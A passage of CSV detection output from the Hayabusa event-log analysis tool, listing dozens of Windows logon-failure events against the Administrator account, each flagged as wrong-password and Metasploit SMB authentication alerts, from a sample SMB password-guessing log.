Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bk5dmjQDnpSlREum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pk4BvYgXBR2whf80 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i6n1su2TUr7ONQr4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: givsEAGfG0smN9Re : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i2YuM0i7a2QuY7xb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xuocQPZpd91adY0E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PvGB1dZrfDWyZoqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w4oi8iL88rJo7g2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cF3OUnytXi4NjvqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WKkJcp3TYj31iJUM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G0E44RVqAE1feU0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ny5LCb1qOIUhxOPY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9jcDgzzqH26DjQ1k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yil94cFkU6UP24SK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bkdVHF3vggCcuNdn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4dRRI2CS3aVIX4nX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: chDZq3VgxIE2mRb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HLVvgMmqLXKZADON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i4avO2AJSlNb0IUL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mdo5CvycGvGhn33y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: heJfjLl1vbX6lMjZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wOP1E6hd4Jtj4gob : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xa7kMCNz0bEGTBqX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HSxTQ4HsZt2DeYVe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YxHpSQwFSV4hveVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n3OwzSPomxZLoCe6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e9IfwDZIfYT6A50K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOf6DbRX4zlNqLdb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 00kXrnJNH40NyoYL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nsNHcb9pnpdRgeL7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucMhgxMXy9Ch1jNm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cfi3ZaLTECJgjM9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: usugjEEBHlhJvOyu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WQ1pM2CVLt5ITVD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NIboW7hNljF3HPpk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rOk5W4rkSYRRw4xS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJTfcwd8rnFc06iF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6sm415W5zkvjdnTV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KEiSbtlmW4ou1mc7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xWeZV5pHt94adwUy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5np7HeCPAFTDdTXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gXbe2jEJVtwaQXlr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7hZFiUCJnaBdHcw4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a71wyo41KV1ZoT7p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogB17WdeOiC19rqn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ANOLPWG12lkW39Ei : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y1vf7OUxb6TH3Q4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 